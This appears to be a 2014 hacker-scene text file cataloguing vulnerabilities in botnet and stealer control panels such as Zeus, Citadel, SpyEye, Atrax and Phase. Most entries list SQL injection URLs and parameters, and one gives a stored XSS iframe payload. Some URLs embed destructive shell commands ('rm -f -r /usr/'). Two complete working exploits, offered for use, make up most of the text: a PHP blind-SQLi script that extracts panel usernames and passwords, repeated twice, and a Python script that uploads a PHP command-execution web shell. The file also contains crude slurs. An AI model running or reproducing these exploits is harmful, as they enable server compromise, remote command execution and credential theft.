+===========================+
# Fuck the botnets                                                 
# Most recent botnet/stealer vulnerabilities  
# Project by abdilo                                                 
#                                                                                  
# Contact: [email protected]                           
# Twitter: 4sterea                                                   
#                                                          
# For more shit visit: www.abdilo.com/ftb    
# Credits to abdilo and asterea                         
+===========================+


 Random panel
==========

Type: SQLi
Vuln: http://site.com/g.php?id=1


 Athena
==========

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now

 Alin1
==========

Nothing, unless logged in.


 Betabot
==========

Nope.


 Blackhole 2.1
==========

Bunch of XSS's and file manipulation vulns, nothing interesting.



 Carberp
==========

You can check, we had no time to do so.


 Casinoloader
==========

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1


 Citadel
==========

Type: SQLi
Vuln: http://localhost/cp.php?bots=1


 CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


 CYTHOSIA BOTNET
=============

Type: Stored XSS and iFrame redirect

Click Add Task and enter the command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME

Then click Create Task. Finally, click Tasks. Voila!

(Credits to asterea for finding this botnet panel)


 DLOADER
=============

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1                
Vuln2: http://localhost/includes/update_url.php?fid=1


HERPES
=============

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1


JACKPOS
=============

Blind SQLi after you log in; pretty useless, so I won't bother.


JHTTP
=============

Some SQL injection vulnerabilities past the assets folder.


PLASMA
=============

Some cross-site scripting vulns and nothing else, so no use telling you about them.


SAKURA
=============

Type: SQLi

http://localhost/func.php?showtopic=2
http://localhost/index.php?showtopic=322
http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312
http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor
http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10
http://localhost/showthread.php?t=123
http://localhost/showthread.php?t=23&cmd=32

Type: SQLi - POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds
http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123
http://localhost/sakuraadmin44.php?threads=21 POST: snick=1


SILENCE WINLOCKER V5.0
=================

SQL injection.

http://localhost/forma.php?pin=4322
http://localhost/index.php?x=1&act=delete&id=1
http://localhost/picture.php?pin=8787
http://localhost/tmp/get.php?pin=1334


SMOKE LOADER
=============

Type: SQLi

http://localhost/control.php?id=1
http://localhost/guest.php?id=1

POST


SMSBOT
=============

Nothing interesting.


SOLARBOT
=============

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD


SPY POSCARDSTEALER
=============

Nope, it's secure.


SPY-EYE
=============

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998


TINBA
=============

Type: SQLi

\tinybanker panel\admin/control/logs.act.php
http://localhost/logs.act.php
Post Data: bot_uid=1&botcomment=mate


UMBRA
=============

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1


VERTEXNET
=============

There are SQL injection vulnerabilities, but the likelihood of you actually finding a way of exploiting them is low.


ZEUS AND ZEUS EVO
=============

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8


ZSKIMMER
=============

Type: SQLi

Vuln: http://localhost/process.php?xy=2


iBanking
=============

Type: Shell upload

shell:

<?php
	// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
	// Start with PHP CLI (php pwn.php)
	set_time_limit(0);
	
	// Adjust this :)
	define('SLEEP_TIME', '4');
	define('PAGE_TIME',  4);
	define('URL',        'http://localhost/Phase/');
	
	echo('attacking ' . URL . PHP_EOL);
	
	get_string('username');
	get_string('password');
	
	function get_length($field) {
		$length = 1;
		
		while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
			++$length;
		}
		
		echo($field . ' length: ' . $length . PHP_EOL);
		
		return $length;
	}
	
	function get_string($field) {
		$length = get_length($field);
		$str    = '';
		
		for ($i = 0; $i < $length; ++$i) {
			$str .= chr(get_char($field, $i));
			echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
		}
		
		return $str;
	}
	
	function get_char($field, $id) {
		$binary = '';
		
		for ($i = 1; $i < 256; $i *= 2) {
			if ($i == 128)
				$binary = '0' . $binary;
			else
				$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
		}
		
		return bindec($binary);
	}
	
	function is_true($query) {
		$rc4_key   = 'aaaa'; // b d u
		$data      = 'u=tapz&d=faggot&b=lol';
		$encode    = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
		$encode    = $rc4_key . $encode;
		$injection = urlencode($query);
		$req       = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
		
		return !($req['time'] < PAGE_TIME);
	}
	
	function post_request($url, $data) {
        $handle = curl_init($url);
        
        curl_setopt($handle, CURLOPT_HEADER,         false);
        curl_setopt($handle, CURLOPT_USERAGENT,      'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($handle, CURLOPT_POST,           true);
        curl_setopt($handle, CURLOPT_POSTFIELDS,     $data);
		curl_setopt($handle, CURLOPT_TIMEOUT,        30);
        
		$time = microtime(true);
        $page = curl_exec($handle);
        $time = microtime(true) - $time;
		
        curl_close($handle);
		
        return array(
			'page' => $page,
			'time' => $time
		);
    }
	
	function rc4($pwd, $data, $data_length, $pwd_length){
		$key[] = '';
		$box[] = '';
		$cipher = '';

		for ($i = 0; $i < 256; $i++)
		{
			$key[$i] = ord($pwd[$i % $pwd_length]);
			$box[$i] = $i;
		}
		for ($j = $i = 0; $i < 256; $i++)
		{
			$j = ($j + $box[$i] + $key[$i]) % 256;
			$tmp = $box[$i];
			$box[$i] = $box[$j];
			$box[$j] = $tmp;
		}
		for ($a = $j = $i = 0; $i < $data_length; $i++)
		{
			$a = ($a + 1) % 256;
			$j = ($j + $box[$a]) % 256;
			$tmp = $box[$a];
			$box[$a] = $box[$j];
			$box[$j] = $tmp;
			$k = $box[(($box[$a] + $box[$j]) % 256)];
			$cipher .= chr(ord($data[$i]) ^ $k);
		}
		return $cipher;
	}

creds to: Xytilol

Atrax botnet
==============

Type: Shell Upload

Shell:

#!/usr/bin/python

import random
import string
import base64
import urllib
import urllib2
 
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url     = 'http://localhost/atrax/'
# </CONFIG>
 
BOT_MODE_INSERT             = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN          = 'e'
GET_PARAM_MODE              = 'a' # GET PARAM
POST_PARAM_GUID             = 'h' # POST PARAM
POST_PARAM_IP               = 'i'
POST_PARAM_BUILDID          = 'j'
POST_PARAM_PC               = 'k'
POST_PARAM_OS               = 'l'
POST_PARAM_ADMIN            = 'm'
POST_PARAM_CPU              = 'n'
POST_PARAM_GPU              = 'o'
POST_PARAM_PLUGINNAME       = 'q'
 
def request(url, get, post):
        if not get == '':
                url += '?' + get
        encoded = {}
        if not post == '':
                for _ in post.split('&'):
                        data             = _.split('=')
                        encoded[data[0]] = data[1]
        encoded  = urllib.urlencode(encoded)
        request  = urllib2.Request(url, encoded)
        response = urllib2.urlopen(request)
        page     = response.read()
        return page
 
def queryValue(key, value, next=True):
        ret = key + '=' + value
        if next:
                ret += '&'
        return ret
 
def randomString(length = 8):
        return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
 
def createVictim(url, guid, ip):
        get   = queryValue(GET_PARAM_MODE,     BOT_MODE_INSERT, False)
        post  = queryValue(POST_PARAM_GUID,    guid)
        post += queryValue(POST_PARAM_IP,      ip)
        post += queryValue(POST_PARAM_BUILDID, randomString())
        post += queryValue(POST_PARAM_PC,      randomString())
        post += queryValue(POST_PARAM_OS,      randomString())
        post += queryValue(POST_PARAM_ADMIN,   'yes')
        post += queryValue(POST_PARAM_CPU,     randomString())
        post += queryValue(POST_PARAM_GPU,     randomString(), False)
        return request(url + 'auth.php', get, post)
 
def exploit(url, guid, ip, file, payload):
        get   = queryValue(GET_PARAM_MODE,        BOT_MODE_RUNPLUGIN, False)
        post  = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
        post += queryValue(POST_PARAM_GUID,       guid)
        post += queryValue(POST_PARAM_IP,         ip)
        post += queryValue('am',                  randomString())
        post += queryValue('ad',                  file)
        post += queryValue('ab',                  base64.b64encode(payload))
        post += queryValue('ai',                  '18', False)
        request(url + 'auth.php', get, post)
 
def testExploit(url, guid, ip):
        file    = randomString() + '.php'
        payload = '<?php echo("1337"); ?>'
        exploit(url, guid, ip, file, payload)
        return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
         
guid    = '7461707a7461707a7461707a7461707a'
ip      = '91.224.13.103'
file    = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
        print '[-] Cannot create victim...'
else:
        print '[~] Victim created/updated...'
        if testExploit(url, guid, ip):
                exploit(url, guid, ip, file, payload)
                print '[+] Exploit uploaded!'
                print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
        else:
                print '[-] Cannot upload payload, maybe the plugin is not actived?'
 

Phase botnet
===============

Type: blind SQLi

Vuln:

<?php
	// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
	// Start with PHP CLI (php pwn.php)
	set_time_limit(0);
	
	// Adjust this :)
	define('SLEEP_TIME', '4');
	define('PAGE_TIME',  4);
	define('URL',        'http://localhost/Phase/');
	
	echo('attacking ' . URL . PHP_EOL);
	
	get_string('username');
	get_string('password');
	
	function get_length($field) {
		$length = 1;
		
		while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
			++$length;
		}
		
		echo($field . ' length: ' . $length . PHP_EOL);
		
		return $length;
	}
	
	function get_string($field) {
		$length = get_length($field);
		$str    = '';
		
		for ($i = 0; $i < $length; ++$i) {
			$str .= chr(get_char($field, $i));
			echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
		}
		
		return $str;
	}
	
	function get_char($field, $id) {
		$binary = '';
		
		for ($i = 1; $i < 256; $i *= 2) {
			if ($i == 128)
				$binary = '0' . $binary;
			else
				$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
		}
		
		return bindec($binary);
	}
	
	function is_true($query) {
		$rc4_key   = 'aaaa'; // b d u
		$data      = 'u=tapz&d=faggot&b=lol';
		$encode    = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
		$encode    = $rc4_key . $encode;
		$injection = urlencode($query);
		$req       = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
		
		return !($req['time'] < PAGE_TIME);
	}
	
	function post_request($url, $data) {
        $handle = curl_init($url);
        
        curl_setopt($handle, CURLOPT_HEADER,         false);
        curl_setopt($handle, CURLOPT_USERAGENT,      'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($handle, CURLOPT_POST,           true);
        curl_setopt($handle, CURLOPT_POSTFIELDS,     $data);
		curl_setopt($handle, CURLOPT_TIMEOUT,        30);
        
		$time = microtime(true);
        $page = curl_exec($handle);
        $time = microtime(true) - $time;
		
        curl_close($handle);
		
        return array(
			'page' => $page,
			'time' => $time
		);
    }
	
	function rc4($pwd, $data, $data_length, $pwd_length){
		$key[] = '';
		$box[] = '';
		$cipher = '';

		for ($i = 0; $i < 256; $i++)
		{
			$key[$i] = ord($pwd[$i % $pwd_length]);
			$box[$i] = $i;
		}
		for ($j = $i = 0; $i < 256; $i++)
		{
			$j = ($j + $box[$i] + $key[$i]) % 256;
			$tmp = $box[$i];
			$box[$i] = $box[$j];
			$box[$j] = $tmp;
		}
		for ($a = $j = $i = 0; $i < $data_length; $i++)
		{
			$a = ($a + 1) % 256;
			$j = ($j + $box[$a]) % 256;
			$tmp = $box[$a];
			$box[$a] = $box[$j];
			$box[$j] = $tmp;
			$k = $box[(($box[$a] + $box[$j]) % 256)];
			$cipher .= chr(ord($data[$i]) ^ $k);
		}
		return $cipher;
	}




# siph0n [2014-08-14]